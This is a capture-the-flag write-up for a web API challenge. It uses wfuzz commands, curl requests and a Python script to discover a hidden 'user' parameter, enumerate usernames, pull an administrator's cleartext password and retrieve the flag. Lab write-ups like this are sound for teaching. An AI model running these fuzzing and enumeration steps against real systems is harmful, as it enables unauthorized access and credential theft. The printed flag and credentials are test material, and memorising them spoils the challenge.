API (silver, 100p)

We found a nice target where some backend API communication is happening behind the scenes at https://10.XX.32.95:1006/.
Sometimes it is possible to extract valuable information by tampering with some parameters.
A dictionary attack may be used against the index.php script, and it seems that a web proxy is the best tool for this job.
Can you reverse engineer the messages and extract some information from this endpoint?

solution

Opening the web page returns an API error.

Backend API Error, empty request OR name not set

Based on the challenge description, parameter names were fuzzed with the Burp parameter-name wordlist from SecLists. GET fuzzing found nothing, but POST fuzzing (with the candidate name still in the query string) turned up a user parameter. The error message above is 48 characters long, so --hh 48 hides every response identical to that baseline and only the one parameter that changes the response is shown.

$ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -X POST --hh 48 https://10.XX.32.95:1006/?FUZZ=test
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://10.XX.32.95:1006/?FUZZ=test
Total requests: 2588

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000015:   200        0 L      6 W        29 Ch       "user"

Total time: 3.204631
Processed Requests: 2588
Filtered Requests: 2587
Requests/sec.: 807.5812
$ curl -X POST -k https://10.XX.32.95:1006/?user=test
No user found with name: test

Fuzzing the user parameter with a short username list, hiding every response that contains "No user found", returns a full record for administrator, including a cleartext password and a document root.

$ wfuzz -c -z file,/usr/share/seclists/Usernames/top-usernames-shortlist.txt -X POST --hs 'No user found' https://10.XX.32.95:1006/?user=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://10.XX.32.95:1006/?user=FUZZ
Total requests: 17

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000009:   200        0 L      6 W        117 Ch      "administrator"

Total time: 0.426322
Processed Requests: 17
Filtered Requests: 16
Requests/sec.: 39.87594
$ curl -X POST -k https://10.XX.32.95:1006/?user=administrator
Username: administrator<br>Password: terminator008<br>UserID:   1<br>IP:        127.0.0.1<br>Documentroot:  /virtualadmin<br>
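The two wfuzz passes above (hide-by-length parameter discovery, then hide-by-string username enumeration) plus parsing of the Key: value&lt;br&gt; record, written out as a small Python script. This is an added example, not part of the original write-up or the challenge; it runs against a constructed in-memory stand-in that reproduces the three responses seen above, and the target URL, wordlists and the http_sender helper are assumptions for a real run.

```python
"""Parameter discovery and username enumeration, the way the wfuzz runs
above work, as an added example.  Runs offline against mock_backend;
http_sender() is the real POST-with-query-string sender (assumed, mirrors
the curl/wfuzz invocations) for use against a live target."""
import ssl
import urllib.parse
import urllib.request
from typing import Callable, Dict, List

Sender = Callable[[Dict[str, str]], str]  # params -> response body

# Constructed stand-in for the challenge API: only the record the write-up shows.
MOCK_USERS = {
    "administrator": {
        "Username": "administrator", "Password": "terminator008",
        "UserID": "1", "IP": "127.0.0.1", "Documentroot": "/virtualadmin",
    },
}


def mock_backend(params: Dict[str, str]) -> str:
    """Reproduces the three observed responses: error, miss, or record."""
    name = params.get("user")
    if not name:
        return "Backend API Error, empty request OR name not set"
    record = MOCK_USERS.get(name)
    if record is None:
        return f"No user found with name: {name}"
    return "".join(f"{k}: {v}<br>" for k, v in record.items())


def http_sender(url: str, insecure: bool = True) -> Sender:
    """POST with the parameter in the query string, like wfuzz -X POST above.
    insecure=True mirrors curl -k for the self-signed certificate (assumed)."""
    ctx = ssl.create_default_context()
    if insecure:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE

    def send(params: Dict[str, str]) -> str:
        full = url.rstrip("/") + "/?" + urllib.parse.urlencode(params)
        req = urllib.request.Request(full, data=b"", method="POST")
        with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
            return resp.read().decode(errors="replace")
    return send


def discover_params(send: Sender, names: List[str], value: str = "test") -> List[str]:
    """Equivalent of `--hh <baseline length>`: take the empty request as the
    baseline and report every name whose response length differs from it."""
    baseline_len = len(send({}))
    return [n for n in names if len(send({n: value})) != baseline_len]


def enumerate_users(send: Sender, param: str, candidates: List[str],
                    miss_marker: str = "No user found") -> Dict[str, str]:
    """Equivalent of `--hs 'No user found'`: keep only bodies lacking the marker."""
    hits: Dict[str, str] = {}
    for cand in candidates:
        body = send({param: cand})
        if miss_marker not in body:
            hits[cand] = body
    return hits


def parse_record(body: str) -> Dict[str, str]:
    """Parse the 'Key: value<br>' record returned for a known user."""
    rec: Dict[str, str] = {}
    for field in body.split("<br>"):
        if ":" in field:
            key, val = field.split(":", 1)
            rec[key.strip()] = val.strip()
    return rec


def run(send: Sender, param_words: List[str], user_words: List[str]) -> Dict[str, Dict[str, str]]:
    """Full chain: find the accepted parameter, enumerate users, parse each hit."""
    results: Dict[str, Dict[str, str]] = {}
    for param in discover_params(send, param_words):
        for user, body in enumerate_users(send, param, user_words).items():
            results[user] = parse_record(body)
    return results


if __name__ == "__main__":
    # Constructed mini wordlists; swap in the SecLists files for a real target,
    # e.g. run(http_sender("https://10.XX.32.95:1006"), params, users).
    print(run(mock_backend, ["id", "name", "user", "debug"],
              ["admin", "root", "administrator"]))
```

The length-based baseline is the weak point of this approach, exactly as with --hh: a parameter that is accepted but yields a same-length error is invisible, so on a real target it is worth re-running with a different filter (status code, word count, or a response-body marker) before concluding that GET accepts nothing.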

Opening /virtualadmin shows a simple login form.

screenshot of VirtualAdmin

Logging in as administrator with password terminator008 returns flag.

Flag: b5d7407c-1afb-42d6-aef4-40b94733aad9